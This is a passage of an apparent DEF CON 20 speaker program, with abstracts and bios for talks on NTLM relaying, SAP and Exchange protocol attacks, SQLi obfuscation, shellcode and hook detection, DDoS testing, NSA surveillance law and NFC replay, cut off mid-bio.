pentesters just delivered their “compliant” report. They thought their Windows domain was secure.
They thought wrong.
Zack Fasel (played by none other than Angelina Jolie) brings a New Tool along with New methods to
obtain Windows Integrated Authentication network requests and perform NTLM relaying both internally
and externally. The Goal? Start off as a nobody and get domain admin (or sensitive data/access) in 60
seconds or less on a fully patched and typically secured Windows environment. The Grand Finale? Zack
demonstrates the ability to *externally* gain access to a Windows domain user's Exchange account
simply by sending them an email, along with tips on how to protect yourself from these attacks.
In just one click of a link, one view of an email, or one wrong web request, this new toolset steals
the identity of targeted users and leverages their access. Call your domain admins, hide your road
warriors, and warn your internal users. Zack will change the way you think about Windows Active
Directory Security and trust relationships driving you to further harden your systems and help you sleep at night.
Owned in 60 Seconds. Coming This Summer.
Zack Fasel is a seasoned Penetration Tester and Security
Consultant with diverse experience serving clients ranging from Fortune 1000s to Enterprises and SMBs
in varying industries. He has delivered hundreds of network, wireless, and social penetration tests
and subsequently driven strong defensive remediation strategies as a result. Zack tries to stay
closely connected to the local security community in Chicago as the lead for dc312[.org] and as
a Co-Founder of THOTCON[.org], Chicago’s local Hacking con. When not focusing his efforts on
Infosec, Zack can be found playing the untz untz wubs, taking photos, fending off the ladies,
or trying to find the nearest Chipotle. Stalkers can stalk him over at zfasel.com or @zfasel on the twitters.
Twitter: @zfasel
zfasel.com
Hellaphone: Replacing the Java in Android
John Floren Senior Member of Technical Staff, Sandia National Labs
Android is the only widespread open-source phone environment available today, but actually hacking
on it can be an exercise in frustration, with over 14 million lines of code (not counting the Linux kernel!), build times
in the hours, and the choice of writing Java or C++/JNI. Add in security debacles like the CarrierIQ affair or the alleged
man-in-the-middle attacks at the last DEF CON and Android starts to seem less attractive.
We wanted a phone that's easy to hack on, with a quick development turnaround time. By killing off the Java layer of
Android and only loading the underlying Linux system, we found a useful, relatively light-weight platform for further
development. We then adapted the Inferno operating system to run on our phones, eventually getting a graphical phone
environment in under 1 million lines of code, including a phone application, an SMS app, several text editors, a shell,
a compiler, a web browser, a mail client, and even some games. The actual core of the Inferno OS is small and simple
enough for one person to read, understand, audit, and hack on; applications are similarly simple and easy to write.
This talk discusses in greater depth our motivations and the methods we used to adapt Android phones to new and excitingly broken
purposes. If the Demo Gods are kind, there will also be a demonstration of the Inferno phone environment.
*Sandia National Laboratories is a multi-program laboratory managed and operated by Sandia Corporation, a wholly owned subsidiary
of Lockheed Martin Corporation, for the U.S. Department of Energy's National Nuclear Security Administration under contract
DE-AC04-94AL85000. SAND-2012-3785 A
John Floren is a Senior Member of Technical Staff at Sandia National
Laboratories, where he works in High Performance Computing and security research. He occasionally puts odd operating
systems on inappropriate systems, so far having helped port Plan 9 to the IBM Blue Gene series and Inferno to cell phones.
Hacking [Redacted] Routers
FX Leader, Phenoelit Group, Recurity Labs
Greg Recurity Labs
[Redacted] routers are no longer devices only seen in [Redacted]. Entire countries run their
Internet infrastructure exclusively on these products and established tier 1 ISPs make increasing use of
them. However, very little is known of [Redacted]'s Software Platform and its security. This
presentation will introduce the architecture, special properties of configurations and services as well
as how to reverse engineer the OS. Obviously, this is done only to ensure compatibility with router products of other vendors ;)
Routers might still be hurt in the process.
FX is the leader of the Phenoelit group and loves to hack
pretty much everything with a CPU and some communication, preferably networked. He looks back at
around fifteen years of (legal) hacking with only a couple of Cisco IOS and SAP remote exploits, tools
for hacking HP printers and protocol attacks lining the road.
In his day life, FX runs Recurity Labs GmbH, a security consulting and research company in
Berlin, Germany.
Twitter: @41414141
Greg joined the Recurity Labs team in early 2008. Prior to
Recurity Labs, Greg worked as a freelancer for a number of large customers. Greg is experienced in
source code audits, black box analysis and reverse engineering. Furthermore, Greg also performs
software/system design work at Recurity Labs. Greg works on various internal research projects,
where he applies his taste for cryptography.
Demorpheus: Getting Rid Of Polymorphic Shellcodes In Your Network
Svetlana Gaivoronski PhD Student, Moscow State University
Dennis Gamayunov Senior Researcher, Moscow State University
One of the most effective techniques used in CTF is the use of various exploits,
written with the help of well-known tools or even manually during the game. Experience in CTF participation
shows that a mechanism for detecting such exploits can significantly increase the defense level of
the team.
In this presentation we propose an approach and a hybrid shellcode detection method aimed at early detection and
filtering of unknown 0-day exploits at the network level. The proposed approach allows us to combine the capabilities
of the shellcode detection algorithms developed over the last ten years into optimal classifiers. The proposed approach
allows us to reduce the total false-positive (FP) rate almost to 0, provides full coverage of the shellcode classes detected by individual
classifiers, and significantly increases the total throughput of the detectors. Evaluation with shellcode datasets,
including Metasploit Framework 4.3 plain-text, encrypted and obfuscated shellcodes, benign Win32 and Linux ELF
executables, random data and multimedia, shows that the hybrid data-flow classifier significantly boosts analysis
throughput for benign data - up to 45 times faster than a linear combination of classifiers, and almost 1.5
times faster for shellcode-only datasets.
Svetlana Gaivoronski is a PhD student at the Computer Systems Lab,
Computer Science Dept. of Moscow State University, Russia. Svetlana is a member of the Bushwhackers CTF
team, which has achieved the following results in recent years: 2nd place in Deutsche Post Security Cup 2010,
6th place in the final of ruCTF 2012 (8th at qualification), 12th place at ruCTF Europe 2011,
4th place in the final of ruCTF 2011 (and 1st at qualification), etc. Svetlana works on the Redsecure project (experimental IDS/IPS)
at Moscow State University. Her primary interests are network worm propagation detection and filtering,
shellcode detection, and static and runtime analysis of malware.
Twitter: @SadieSV
lvk.cs.msu.su/~sadie
Dennis Gamayunov holds a PhD and works as a Senior Researcher at the Computer Systems Lab,
Computer Science Dept. of Moscow State University, Russia. Dennis is the leader of the small network
security research group in MSU, project lead of the experimental event-driven and natively multicore
Redsecure IDS/IPS, founder of Bushwhackers CTF team, with primary research and practical interests in
network level malcode detection, high-speed traffic processing (including FPGA-based), and OS
security with fine-grained privilege separation, SELinux and beyond.
Twitter: @jamadharma
http://redsecure.ru/team/denis-gamayunov
New Techniques in SQLi Obfuscation: SQL never before used in SQLi
Nick Galbreath
SQLi remains a popular sport in the security arms-race. However,
after analysis of hundreds of thousands of real world SQLi attacks, output from SQLi scanners,
published reports, analysis of WAF source code, and database vendor documentation, both SQLi
attackers and defenders have missed a few opportunities. This talk will iterate through the
dark corners of SQL for use in new obfuscated attacks, and show why they are problematic for
regular-expression based WAFs. This will point the way for new directions in SQLi research
for both offense and defense.
Nick Galbreath is a director of
engineering at Etsy, overseeing groups handling fraud, security, authentication and internal
tools. Over the last 18 years, Nick has held leadership positions in a number of social and
e-commerce companies, including Right Media, UPromise, Friendster, and Open Market, and has
consulted for many more. He is the author of "Cryptography for Internet and Database
Applications" (Wiley), and was awarded a number of patents in the area of social networking.
He holds a master's degree in mathematics from Boston University.
Twitter: @ngalbreath
http://client9.com
https://github.com/client9
Uncovering SAP Vulnerabilities: Reversing and Breaking the Diag Protocol
Martin Gallo Security Consultant, Core Security
Nowadays, SAP Netweaver has become the most extensive platform for building enterprise applications and running
critical business processes. In recent years it has become a hot topic in information security. However, while fixes and
countermeasures are released monthly by SAP at an incredible rate, the available security knowledge is limited and some
components are still not well covered.
SAP Diag is the application-level protocol used for communications between SAP GUI and SAP Netweaver Application Servers, and it's
a core part of any ABAP-based SAP Netweaver installation. Therefore, if an attacker is able to compromise this component, the
result is a total takeover of the SAP system. In recent years, the Diag protocol has received some attention from the security
community and several tools focused on decompression and sniffing were released. Nevertheless, the protocol specification is not
public and its internal components and inner workings remain unknown; the protocol was not well understood and there is no publicly
available tool for active exploitation of real attack vectors.
This talk is about taking SAP penetration testing out of the shadows and shedding some light on SAP Diag, by introducing a
novel way to uncover vulnerabilities in SAP software through a set of tools that allow analysis and manipulation of the SAP
Diag protocol. In addition, we will show how these tools and the knowledge acquired while researching the protocol can be used
for vulnerability research, fuzzing and practical exploitation of novel attack vectors involving both SAP's client and server
applications: man-in-the-middle attacks, RFC call injection, rogue SAP server deployment, SAP GUI client-side attacks and more.
As a final note, this presentation will also show how to harden your SAP installations and mitigate these threats.
Martin Gallo is a Security Consultant at CORE Security, where he performs
application and network penetration testing, conducts code reviews and identifies vulnerabilities
in enterprise and third party software. His research interests include enterprise software security,
vulnerability research and reverse engineering.
Post-Exploitation Nirvana: Launching OpenDLP Agents over Meterpreter Sessions
Andrew Gavin Security Consultant, Verizon Business
Michael Baucom Vice President of R&D, N2 Net Security Inc.
Charles Smith Software Developer, N2 Net Security Inc.
OpenDLP is a free and open source agent-based data discovery tool that works against Microsoft Windows
systems using appropriate authentication credentials. However, one drawback to OpenDLP is that its policy-driven approach
makes it arduous to scan disjointed systems that are not part of a Windows domain or do not share the same authentication
credentials. To fix this, OpenDLP can now launch its agents over Meterpreter sessions using Metasploit RPC without
requiring domain credentials.
Andrew Gavin, creator of OpenDLP, is an information security consultant at
Verizon Business. He has more than 12 years of experience in security assessments of networks and applications. He has
consulted for numerous customers in various industries around the world.
Twitter: @OpenDLP (project), @andrewgavin (personal)
Michael Baucom is the VP of Engineering at N2 Net Security. Michael has taught
classes on exploit development and was the technical editor for Gray Hat Hacking: the Ethical Hacker's Handbook. He has worked
in development for over 15 years in various industries. While at N2 Net Security he has worked on a wide variety of projects
including software security assessments, tool development, and penetration tests.
Charles Smith is a graduate of North Carolina State University, and has been
building credit card software and developer tools and modules for the last ten years. Recently he joined N2 Net
Security, and has put his skills to ferreting out security vulnerabilities and building new tools to help penetration
testers do their jobs more efficiently. He specializes in C++, but is also well-versed in Java, .NET, VB, and Perl.
The Art of Cyberwar
Kenneth Geers NCIS Cyber Subject Matter Expert
The establishment of US Cyber Command in 2010 confirmed that
cyberspace is a new domain of warfare. Computers are now both a weapon
and a target. Future wars may even be fought over the ownership of IT
infrastructure. Therefore, national security thinkers must find a way
to incorporate cyber attack and defense into military doctrine as soon
as possible. The world’s most influential military treatise is Sun
Tzu’s Art of War. Its wisdom has survived myriad revolutions in
technology and human conflict, and future cyber commanders will find
Sun Tzu’s guidance beneficial. However, this presentation will also
consider 10 revolutionary aspects of cyber war that will be difficult
to fit into military doctrine.
Kenneth Geers (PhD, CISSP) is the U.S. Naval Criminal Investigative
Service (NCIS) Cyber Subject Matter Expert. Mr. Geers has been a
student in six countries, served as an intelligence analyst, a French
and Russian linguist, and a computer programmer in support of arms
control initiatives. He was the first U.S. Representative to the
Cooperative Cyber Defence Centre of Excellence in Tallinn, Estonia.
Kenneth is widely published on the relationship between information
technology and national security, and is the author of Strategic Cyber
Security, now a free download: http://ccdcoe.org/278.html.
Twitter: @kennethgeers
http://www.chiefofstation.com
More Projects of Prototype This!
Joe Grand Electrical Engineer, Grand Idea Studio
Zoz Robotics Engineer
For 18 months, Joe Grand and Zoz Brooks were co-hosts of Discovery Channel's
Prototype This, an engineering entertainment program that followed the real-life design process of
a unique prototype every episode.
At DEF CON 17, Joe and Zoz talked about the show and a few of their favorite builds. The dynamic
nerd duo returns to DEF CON 20 with design details and never-before-seen pictures and videos of
even more ridiculous and crazy projects, including the Mind Controlled Car, Boxing Robots,
Six-Legged All Terrain Vehicle, Get Up and Go, and Automated Pizza Delivery, each of
which had to be designed and built in a matter of weeks.
Joe Grand is an electrical engineer and hardware hacker specializing in the design of consumer and hobbyist embedded
systems. He created the electronic badges for DEF CON 14-18 and was a co-host of
Discovery Channel's Prototype This. Back in the day, he was a member of the
infamous hacker group L0pht Heavy Industries.
Twitter: @joegrand
http://www.grandideastudio.com/
Zoz is a robotics engineer, pyrochemist,
and inveterate tinkerer. He got his PhD from the Robotic Life group at the MIT Media
Lab primarily so he could say "Trust me, I'm a doctor" to other robots. One of his
biggest goals is to restore science and engineering education to pride of place as
a top global priority, so when he discovered that this aim could be combined with
his love of media whoring he co-hosted Prototype This! for the Discovery Channel.
Hacking Measured Boot and UEFI
Dan Griffin President, JW Secure, Inc.
There's been a lot of buzz about UEFI Secure Boot, and the ability of hardware and software
manufacturers to lock out third-party loaders (and rootkits). Even the NSA has been advocating the adoption
of measured boot and hardware-based integrity checks. But what does this trend mean to the open source and
hacker communities? In this talk I'll demonstrate measured boot in action. I'll also be releasing my new
Measured Boot Tool, which allows you to view Trusted Platform Module (TPM) boot data and identify risks
such as unsigned early-boot drivers. And, I'll demonstrate how measured boot is used for remote
device authentication.
Finally, I'll discuss weaknesses in the system (hint: bootstrapping trust is still hard),
what this technology means to the consumerization trend in IT, and what software and
services gaps exist in this space for aspiring entrepreneurs.
Dan Griffin is the founder of JW Secure, a
Seattle-based security software company. He has published several articles on security
software development, as well as on IT security, and is a frequent conference speaker.
Dan holds a Masters degree in Computer Science from the University of Washington and a
Bachelors degree in Computer Science from Indiana University. Dan previously gained
notoriety for demonstrating how to use a hacked smart card to compromise
Windows Vista.
Twitter: @jwsdan
Exchanging Demands
Peter Hannay Security Researcher, PhD Student
Smart phones and other portable devices are increasingly used
with Microsoft Exchange to allow people to check their corporate emails or sync
their calendars remotely. Exchange has an interesting relationship with its
mobile clients. It demands a certain level of control over the devices,
enforcing policy such as password complexity, screen timeouts, remote lockout
and remote wipe functionality. This behavior is usually accepted by the
user via a prompt when they first connect to Exchange. However, the protocol
for updating these policies provides very little in the way of security and
is quickly accepted by the device, often with no user interaction required.
In this talk we will focus on the remote wipe functionality and how a potential
attacker could abuse this functionality to remotely wipe devices that are connected
to Exchange. By impersonating an Exchange server and sending appropriate policy
updates through a simple script we are able to erase all data on devices remotely
without any need for authentication. The presentation will explain how this can
be accomplished and show proof of concept code for Android & iOS devices.
Peter Hannay is a PhD student, researcher
and lecturer based at Edith Cowan University in Perth, Western Australia. His PhD
research is focused on the acquisition and analysis of data from small and
embedded devices. In addition to this he is involved in smart grid &
network security research and other projects under the banner of the SECAU research organisation.
Peter is an accomplished academic, with more than 20 publications in peer-reviewed
conferences and journals; in addition, he is a regular speaker at the Ruxcon and Kiwicon
hacker conferences taking place in Australia and New Zealand respectively.
Twitter: @kronicd
http://openduck.com
Changing the Security Paradigm: Taking Back Your Network and Bringing Pain to the Adversary
Shawn Henry CrowdStrike
The threat to our networks is increasing at an unprecedented rate.
The hostile environment we operate in has rendered traditional security strategies obsolete.
Adversary advances require changes in the way we operate, and "offense" changes the game.
Prior to joining CrowdStrike, Shawn Henry
was with the FBI for 24 years, most recently as Executive Assistant Director, where he
was responsible for all FBI criminal investigations, cyber investigations, and international operations worldwide.
Busting the BARR: Tracking “Untrackable” Private Aircraft for Fun & Profit
Dustin Hoffman President & Senior Engineer, Exigent Systems Inc.
Semon Rezchikov Independent Researcher
Private aircraft provide transportation to interesting people: corporate officers,
business owners, celebrities, high net-worth individuals, etc.
In recent years, sites like FlightAware have made it trivial to access all public flight plans. However, aircraft
owners can opt into a block list (the BARR) that prevents their flight information from being made public. All the
interesting people are on the BARR.
We’ll explain the basics of how the ATC system and sites like FlightAware work, demonstrate
a serious, unpatchable method for tracking otherwise “untrackable”, BARRed aircraft,
and demo our site that lets you do the same.
Dustin Hoffman is the president and senior engineer
of Exigent Systems Inc., an IT services firm based in Southern California. He’s interested in
how all kinds of complex systems work and interact, whether technical, organizational, legal,
or economic. He’s held a Private Pilot’s certificate (PPSEL) since 2008.
Semon Rezchikov is an independent security researcher
and synthetic biologist. He masterminded last year’s presentation on the FAST Airport Security
System and is a 20 Under 20 Fellow. Over the summer, he’s building flexible bioautomation robots
and simulating synthetic morphogenetic multicellular patterning for MIT’s Weiss Lab for Synthetic
Biology. In his free time, he can be found playing around with mathematics, reading too many papers,
and thinking of ways to mess with the systems around him.
Crypto and the Cops: the Law of Key Disclosure and Forced Decryption
Marcia Hofmann Senior Staff Attorney, Electronic Frontier Foundation
Can the government force you to turn over your encryption passphrase or
decrypt your data? The law surrounding police attempts to force decryption is developing at
breakneck speed, with two major court decisions this year alone. This talk will start off
with an in-depth explanation of the Fifth Amendment privilege against self-incrimination,
its origins, and how it applies to government attempts to force disclosure of keys or
decrypted versions of data in the United States. We'll also discuss law enforcement
authority to demand passphrases and decryption of data stored with third parties,
and survey key disclosure laws in other countries.
Marcia Hofmann is a senior staff attorney at
the Electronic Frontier Foundation, where she works on a broad range of digital civil
liberties issues including computer security, electronic privacy, and free expression.
She currently focuses on computer crime and EFF's Coders' Rights Project, which promotes
innovation and protects the rights of curious tinkerers and researchers in their
cutting-edge exploration of technology. Prior to joining EFF, Marcia was staff
counsel and director of the Open Government Project at the Electronic
Privacy Information Center (EPIC).
Passive Bluetooth Monitoring in Scapy
Ryan Holeman
Recognizing a need to support passive bluetooth monitoring in Scapy,
Python's interactive monitoring framework, a project was launched to
produce this functionality. Through this functionality, a new means
for interactively observing bluetooth was created along with Python
APIs to assist in the development of bluetooth auditing, pentesting
and exploitation tools.
The project supplements the work of Michael Ossmann et al. by providing
Python extensions and Scapy modules which interact with an Ubertooth
dongle. The project also provides support for other passive bluetooth
techniques not present in the current Ubertooth core software, such as
NAP identification, vendor lookup, extended logging and more.
In conjunction with this presentation, the source for this project
will be released along with distribution packages for easy
installation.
Ryan Holeman resides in Austin, Texas, where he works as a software
developer specializing in backend services. He has a Master of
Science in Software Engineering and has published papers through ICSM
and ICPC. His spare time is mostly spent digging into various network
protocols and shredding local skateparks.
How to Hack All the Transport Networks of a Country
Alberto García Illera
The presentation is about a real black-hat hacking operation against the transport
network of a country. It can be extrapolated to any other country. We will show how to get full access
to the entire transport network: manipulating parameters to get
free tickets, getting control of the ticket machines, getting clients' CC dumps, hooking
internal processes to get the client info, pivoting between machines, encapsulating all the
traffic to bypass the firewalls, etcetera.
We will show a lot of photos, videos, source code and presentations of the real environment
and the skills used to obtain all the information. We will show how combining social
engineering and technical skills can be used as a deadly weapon.
Alberto García Illera is a 24-year-old who is passionate about
hacking, and especially about social engineering. He studied mathematics and computer systems
in Spain. He has worked several years as a professional pentester. He has spoken
at several seminars teaching hacking techniques to help big companies like Microsoft,
the Spanish government or the Spanish Police's Cyberterrorism department. He is currently
studying cryptographic hash functions applied to IT security.
Bigger Monster, Weaker Chains: The National Security Agency and the Constitution
Jameel Jaffer Deputy Legal Director, American Civil Liberties Union
William Binney Former Official, National Security Agency
James Bamford Investigative Journalist
Alex Abdo Staff Attorney, American Civil Liberties Union
The National Security Agency, the largest, most powerful spy agency in the world,
has taken in an estimated 15 to 20 trillion communications since 9/11, often in defiance of the Constitution
and Congressional statutes. The NSA’s goal, some say, is to collect virtually all of our electronic
communications to allow mass data mining reminiscent of the notorious and now reportedly-defunct program,
Total Information Awareness. The limits on the agency’s authority to sweep up and analyze this information
are critical to our safety and our privacy. The NSA is investing vast amounts in increasing its data
storage, code-breaking and analysis capabilities, frequently claiming the investments are for foreign
intelligence or “cybersecurity” purposes. However, instead of keeping its equipment trained on terrorism
suspects or foreign governments, the NSA is increasingly monitoring the communications of innocent people.
Longtime NSA official and whistleblower Bill Binney will join investigative journalist and NSA expert James
Bamford and ACLU lawyer Alex Abdo to explore the NSA’s goals, reach, and capabilities, and the
legality (or illegality) of its actions.
The panel will be moderated by the Deputy Director of the ACLU, Jameel Jaffer.
Jameel Jaffer is Deputy Legal Director at the ACLU and
Director of the ACLU’s Center for Democracy, which houses the ACLU’s work on national security; human
rights; and speech, privacy, and technology. He has litigated many cases involving government
surveillance, including Doe v. Ashcroft, the case that resulted in the invalidation of the Patriot
Act’s “national security letter” provisions. Among the cases he is currently litigating are Clapper
v. Amnesty, a challenge to warrantless wiretapping under the FISA Amendments Act, a case that the U.S.
Supreme Court will hear this fall; ACLU v. CIA, a suit under the Freedom of Information Act for
records about the “targeted killing” program; and ACLU v. Department of Defense, a FOIA lawsuit
seeking records relating to the Bush administration’s torture program. The last of these cases
has resulted in the disclosure of thousands of government records, including the “torture memos”
written by lawyers in the Bush administration’s Office of Legal Counsel.
Twitter: @JameelJaffer
Facebook: jameel.jaffer
William Binney served in the National Security Agency for almost
four decades, most recently as Technical Director of the World Geopolitical and Military Analysis Reporting
Group and of the Analytic Services Office. Mr. Binney previously worked as the NSA’s Technical Director and
leading analyst for warning for Russia. Before that, he served for four years in the Army Security Agency.
Mr. Binney resigned from the NSA in 2001 to protest illegal monitoring of Americans’ communications. Since
then, he has worked for various government agencies on data management and advanced predictive analysis.
James Bamford is a bestselling author and one of the country’s leading
writers on intelligence and national security issues. His books include “The Puzzle Palace,” “Body of
Secrets,” “A Pretext for War: 9/11, Iraq and the Abuse of America’s Intelligence Agencies,” and most
recently “The Shadow Factory”. Mr. Bamford has also written extensively for magazines, including the
New York Times Magazine, the Atlantic, Harpers, and many other publications. In 2006, he won the National
Magazine Award for Reporting for his piece "The Man Who Sold The War," published in Rolling Stone. In
addition, he writes and produces documentaries for PBS and spent a decade as the Washington investigative
producer for the ABC News program, World News Tonight with Peter Jennings. He also taught at the University
of California, Berkeley, as a distinguished visiting professor.
Twitter: @WashAuthor
Alex Abdo is a Staff Attorney in the ACLU's National Security Project.
He has been involved in the litigation of cases concerning the FISA Amendments Act, the Patriot Act, the International
Emergency Economic Powers Act, and the treatment of detainees in Guantánamo Bay, Afghanistan, Iraq, and the Navy brig
in South Carolina. Among the cases he is currently litigating are: a challenge to warrantless wiretapping under the
FISA Amendments Act, and Freedom of Information Act suits for records relating to the use of Section 215 of the
Patriot Act, the use of “national security letters,” and the Bush administration’s warrantless-wiretapping program.
Twitter: @AlexanderAbdo
Black Ops
Dan Kaminsky Chief Scientist, DKH
If there's one thing we know, it's that we're doing it wrong. Sacred cows make the best hamburgers, so in this year's talk I'm going to play with some techniques that are obviously wrong and evil and naive. There will also be a lot of very interesting code, spanning the range from high speed network stacks to random number engines to a much deeper analysis of non-neutral networks. Finally, we will revisit DNSSEC, both in code, and in what it can mean to change the battleground in your favor.
Dan Kaminsky: I play with toys
http://dankaminsky.com
Twitter: @dakami
Owning One to Rule Them All
Dave Kennedy Chief Security Officer
Dave DeSimone Manager, Information Security
As penetration testers, we often try to impact an organization as efficiently and effectively as
we can to simulate an attack on an organization. What if you could own one system to own them all? That's it, one
system. It's all you need, it's in every company, and as soon as you compromise it, the rest fall (no, not a domain
controller). This presentation will cover a recent penetration test where I came up with a unique avenue to getting
over 13,000 shells in just a few minutes by popping one server. I'll be releasing some custom tools to make this
simplistic and automate the majority of what was used on this attack. Let's pop a box.
Dave Kennedy will be signing copies of his book, Metasploit: The
Penetration Tester's Guide, at 14:00 on Friday at the No Starch Press
table in the Vendor area.
Dave Kennedy is the Chief Security Officer (CSO) for a Fortune 1000 company.
Kennedy is the author of the book Metasploit: The Penetration Testers Guide, the creator of the Social-Engineer
Toolkit (SET), and the creator of Fast-Track. Kennedy has presented on a number of occasions at Black Hat, DEF
CON, ShmooCon, BSIDES, Infosec World, Notacon, AIDE, Hashdays, Infosec Summit, and a number of other conferences.
Kennedy is on the Back|Track and Exploit-DB development team and co-host of the Social-Engineer.org and ISDPodcast
podcast. Kennedy is one of the co-authors of the Penetration Testing Execution Standard (PTES); a framework
designed to fix the penetration testing industry. Kennedy is a co-founder of DerbyCon, a large-scale security
conference in Louisville Kentucky. Kennedy <3's Python.
Twitter: @dave_rel1k
http://www.secmaniac.com/
Dave DeSimone is the Manager of Information Security for a Fortune 1000 company. DeSimone has developed, implemented, and operationalized the global vulnerability management program for multiple distinct international organizations. DeSimone's expertise is in penetration testing, security event response, network security, vulnerability/malware analysis and security architecture. DeSimone has also developed major programs including risk management, penetration testing, and application security.
Twitter: @d2theave
Detecting Reflective Injection
Andrew King Contract Researcher, GrayHat Research, LLC
This talk will focus on detecting reflective injection with some mildly humorous notes and bypassing said protections until vendors start actually working on this problem. It seems amazing that reflective injection still works. Why is that? Because programmers are lazy. They don't want to write new engines, they want to write definitions for an engine that already exists. So what do we do about it? Release a $5 tool that does what $50 AV has failed epically at for several years now...oh and it took me a week or so...Alternately, you could license it to vendors since their programmers are lazy.
Andrew King is a recent graduate. He has been a hobbyist for many years, but has only recently tried to transition into information security as a job field. A previous talk was given at ToorCon on polymorphism as it relates to definitions. He wrote a set of articles demonstrating implementation of simple internal-to-function encoding and decoding. Additional code will be released to demonstrate automation of binary patching to use this method without using a debugger. It is not a fully functional evasion tool, but it does demonstrate pushing this level of obfuscation into a more automated arena. Adding a couple of small code sections could turn this into a usable evasion tool.
Twitter: @aking1012
An Inside Look Into Defense Industrial Base (DIB) Technical Security Controls: How Private Industry Protects Our Country's Secrets
James Kirk Senior Security Consultant / Rapid7, Inc.
With an ever-changing threat of nation states targeting the United States and its infrastructure, and insiders
stealing information for public release, we must continuously evaluate the procedural and technical controls we place on our
national assets. This presentation goes into brief detail on how security controls are developed, reviewed, and enforced at a
national level for protection of data classified up to Top Secret, and some of the major flaws in the security approach to
data privacy.
The purpose of this presentation is to raise awareness of substandard security practices within sensitive areas of the Federal
Government and to influence change in how controls and practices are developed and maintained.
James Kirk is a Senior Security Consultant for Rapid7, Inc. who has over 11
years of experience in various information security disciplines. James, in his previous role, has served as a Special
Agent for the Department of Defense (Defense Security Service) where he conducted numerous security audits of defense
contractor facilities across the United States.
http://kirkjamesm.wordpress dot com
No More Hooks: Detection of Code Integrity Attacks
Xeno Kovah The MITRE Corporation
Corey Kallenberg The MITRE Corporation
Hooking is the act of redirecting program control flow somewhere other than
where it would go by default. For instance, code can be "inline hooked" by rewriting instructions to
unconditionally transfer to other code. Or code can be hooked by manipulating control flow data
like function pointers (IAT, IDT, SSDT, return addresses on the stack, callback addresses in
dynamically allocated objects, etc.). Hooking as a technique is neutral, but it is often used
by malicious software to monitor or hide information on a system.
Memory integrity verification requires the ability to detect unexpected hooks which could be causing
software to lie or be blinded to the true state of the system. But we don't want to make the same
mistake that most security software makes, assuming that they can rely on some built in
access control to keep malice at arms length. The history of exploits is the history of
bypassing access control. We want to have a technique which can detect if we ourselves are
being manipulated to lie even when the attacker is assumed to be at the same
high privilege level as our software.
We believe that such a goal can be achieved with the help of an academic technique known as
software-based, or timing-based, remote attestation. This is a technique which does not
require a hardware root of trust like a TPM in order to bootstrap an ephemeral dynamic
root of trust for measurement. It does this by computing a randomized checksum over its
own memory and other system state, to detect code or control flow integrity attacks.
The self-checking software can still be forced to lie and report an unmodified system,
but thanks to a special looping construction, code which causes it to lie will require
extra instructions per loop. The extra instructions will be multiplied by the number of
loops, causing a macroscopic, remotely-detectable, increase in the runtime vs. what's
expected. So basically, an attacker can force our software to lie, but because there's
a timing side-channel built into the computation, he can still be caught by taking too
long to generate a convincing lie. We have independently implemented and confirmed the
claims of past work, and furthermore showed that the timing discrepancy in the presence
of a checksum-forging attacker is detectable not just for machines on the same ethernet
segment, but over 10 links of our production LAN. Because of the results of other work
in timing side-channel detection over internet-scale distances, we think this technique
can be extended even further. But for now for longer distances, we use this same
timing-based technique in concert with TPM as a trustworthy timer,
so that network jitter is not an issue.
Xeno Kovah has over 379 years of
security experience. Xeno Kovah started programming when he was -6. Xeno Kovah
has been the CSO for all of the Fortune Top 33.3 companies. Xeno Kovah has written
17 of the top 10 best selling security books. Xeno Kovah wrote all of 29A, Phrack,
and Uninformed under various aliases. In Xanadu did Xeno Kovah a stately pleasure
dome decree. Look on his works, ye mighty, and despair.
Twitter: @OpenSecTraining
Corey Kallenberg Corey is a rootkit and trusted
computing researcher currently employed by the MITRE Corporation. In his spare time, Corey
summons the dark powers of Papa Legba to exploit memory corruption vulnerabilities and
bypass exploit mitigation schemes.
DDoS Black and White "Kungfu" Revealed
Anthony "Darkfloyd" Lai Security Researcher, Valkyrie-X Security Research Group (VXRL)
Tony "MT" Miu Researcher, VXRL
Kelvin "Captain" Wong Researcher, VXRL
Alan "Avenir" Chung Researcher, VXRL
Enterprises currently dump millions of bucks on defending against DDoS;
some trading firms here are paying about 5K to 100K USD per day out of
fear of DDoS attacks from China, and InfoSec teams believe their
solutions are already perfect.
Are those controls effective and unbreakable? In the first part of the
presentation, we would like to show our studies and carry out over 10
types of DDoS tests against various big firms and organizations to see
whether their defense is effective, showing how stupid and smart they
are. Various interesting case studies will be briefed :)
In the second part of the presentation, we will detail our proposed
defense model against application-level attacks. We have already
checked with other vendors and researchers about our model; it is
still not yet deployed, and hopefully we can put this out as an open
source project in the future.
Hopefully, you will enjoy this fun session with us and learn
whether your organization could survive even under a DDoS attack.
Anthony "Darkfloyd" Lai
focuses on reverse engineering and malware analysis as well as
penetration testing. His interest is always falling on CTF and analyzing
targeted attacks. He has spoken in Black Hat USA 2010, DEF CON 18 and
19, AVTokyo 2011, Hack In Taiwan 2010 and 2011 and Codegate 2012. His
most recent presentation at DEF CON was about APT Secrets in Asia.
Recently, he has worked with MT, Captain and Avenir on DDoS
research projects. Meanwhile, he is always studying targeted attacks
from mainland China and it would be fun for him to get another attack
perspective from these studies.
Twitter: @anthonation
Tony "MT" Miu has worked at an anti-DDoS company for
a few years. He has expertise in network security and constantly needs to tackle new DDoS attacks against his company's
clients. The task is clearly critical. He knows a lot about the dark side of attacks, and MT is the major leader of both the DDoS
Kungfu and defense model projects.
Kelvin "Captain" Wong works in law enforcement and deals with various
reported criminal cases about DDoS and network intrusion as well as computer forensics. He is the real frontline
investigator fighting with the criminals and suspects.
Alan "Avenir" Chung has more than 8 years of working experience in network security.
He is currently working as a Security Consultant for a professional service provider. Alan specializes in firewalls,
IDS/IPS, network analysis, pen-testing, etc. Alan's research interests are honeypots, computer forensics, telecommunications, etc.
NFC Hacking: The Easy Way
Eddie Lee Senior Security Researcher, Blackwing Intelligence
Until now, getting into NFC/RFID hacking required enthusiasts to buy special hardware and learn
about the underlying transfer protocols. No longer! NFCProxy is a new tool (being released at DEF CON 20) that allows you
to proxy RFID transactions using Android phones. NFCProxy can record and replay RFID transactions from the perspective of
the tag or the PCD (proximity coupling device). NFCProxy is an open source tool/framework that can be used to analyze
13.56 MHz RFID protocols and launch replay (and potentially man in the middle) attacks. You can even use NFCProxy as a
virtual wallet by storing previously scanned RFID enabled credit cards and replaying them later at a POS (point of sale)
terminal. No fancy equipment needed…just two NFC capable Android phones running ICS (one with a custom rom). Owning RFID
enabled credit cards just got easier!
Eddie Lee is a security researcher at Blackwing Intelligence. He specializes
in application security, but is an enthusiast of all things related to security. From exploiting buffer overflows to
